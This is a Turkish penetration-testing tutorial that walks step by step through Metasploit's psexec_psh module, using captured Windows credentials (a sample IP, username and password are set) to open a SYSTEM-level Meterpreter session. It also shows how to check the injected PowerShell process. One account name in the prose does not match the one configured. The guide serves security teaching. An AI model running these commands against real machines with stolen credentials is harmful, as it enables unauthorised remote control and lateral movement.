MSF psexec_psh İstismar Modülü ve Elde Edilen Kimlik Bilgileri ile Windows Bir Bilgisayarlara Meterpreter Bağlantısı Elde Edilmesi

Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola / parola özeti) kullanılarak Windows bilgisayarlara erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı, parolası veya parola özeti) elde edilmiş bir Windows bilgisayara MSF psexec_psh istismar modülü ile Meterpreter bağlantısı gerçekleştirilecektir.

MSF psexec_psh istismar modülünün genel seçenekleri aşağıdaki gibi listelenebilir.

search psexec platform:windows
use exploit/windows/smb/psexec_psh
show options

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-psh-exploit-module-01

Yerel yönetici haklarına sahip Vedat hesabının parolasının açık hali (veya özeti) ile MSF psexec_psh modülü aşağıdaki gibi ayarlanabilir:

set RHOSTS 192.168.100.120
set SMBUSER Levent
set SMBPASS Ll123456
show options

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-psh-exploit-module-02

Modül başlatıldıktan sonra, SYSTEM yetkileri ile Meterpreter bağlantısı elde edilir.

run
getuid
getpid

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-psh-exploit-module-03

Meterpreter bağlantısının enjekte olduğu prosesin, yeni oluşturulan Powershell prosesi olduğu görülmektedir.

ps -s

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-psh-exploit-module-04

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.